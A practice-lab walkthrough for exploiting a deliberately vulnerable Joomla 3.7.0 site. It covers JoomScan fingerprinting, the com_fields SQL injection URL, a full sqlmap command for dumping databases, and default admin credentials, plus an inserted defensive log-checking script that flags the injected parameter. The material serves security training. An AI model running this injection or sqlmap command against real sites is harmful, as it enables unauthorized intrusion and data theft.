Joomla CMS
Let’s see if you can find any known vulnerabilities in this website, which uses Joomla CMS. If there are any vulnerabilities, search for their exploits too. Click on the button below to take the
Step 1: Go to the URL to access the lab (The URL may be different for each user).
http://13.127.128.105/Vulnerable-CMS/Variant-3/
Step 2: Download the OWASP JoomScan tool from this link.
Also, make sure you have Perl installed.
Step 3: Extract the files.
Step 4: Open the terminal or command prompt and type this command:
joomscan -u http://url
Then press Enter.
Step 5: JoomScan will tell you that the version of Joomla is 3.7.0. Search Google for “Joomla 3.7.0 exploit” and you will come across the following exploit:
Step 6: As you can see, it is an SQL injection exploit, and it gives the vulnerable URL as:
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Step 7: Now replace http://localhost with the URL where Joomla is found in the practice lab, i.e. {url}.
So the complete URL becomes:
{url}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
When you open this URL, you will see an SQL error confirming the vulnerability.
Step 8: To exploit the SQL injection vulnerability, open sqlmap in a terminal or command prompt and copy the command (as given in the Exploit-DB exploit):
sqlmap -u "{url}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Then press Enter. (Make sure to enter your lab URL.)
Now proceed with the same approach to extract the database.
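The defender's view of the request used in Steps 6 to 8, as an added example that is not part of the original lab or of Joomla: a log check that flags com_fields requests whose list[fullordering] value is not a plain ordering. The log lines are constructed, and the allowlist pattern and the function names are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: a legitimate ordering value is a column name plus an optional
# direction, e.g. "a.title ASC". Anything else is reported.
SAFE_ORDERING = re.compile(r"[A-Za-z0-9_.]+(\s+(asc|desc))?", re.IGNORECASE)
# Request line of a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_fields'
    '&view=fields&layout=modal&list[fullordering]=updatexml%27 HTTP/1.1" 500 1200',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?option=com_fields'
    '&view=fields&layout=modal&list%5Bfullordering%5D=a.title+ASC HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?option=com_content'
    '&view=article&id=1 HTTP/1.1" 200 9000',
]

def suspicious_ordering(log_line):
    """Return the decoded list[fullordering] value if it is not a plain
    ordering on a com_fields request, otherwise None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    # parse_qs percent-decodes names and values, so list%5Bfullordering%5D
    # and list[fullordering] are treated the same.
    query = parse_qs(urlsplit(match.group(1)).query)
    if "com_fields" not in query.get("option", []):
        return None
    for value in query.get("list[fullordering]", []):
        if not SAFE_ORDERING.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_value) for every flagged log line."""
    # Step 8's command passes --random-agent, so the User-Agent is not a
    # usable signal; the check keys on the parameter itself.
    hits = []
    for line in lines:
        value = suspicious_ordering(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent list[fullordering]={value!r}")
```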
NOTE: Before doing all this, you could simply search for “Joomla default password” and you would learn that the default username is “admin” and the default password is “password”. These credentials work in the practice lab too; hence there are 2 vulnerabilities:
Using CMS with known vulnerability
CMS with default password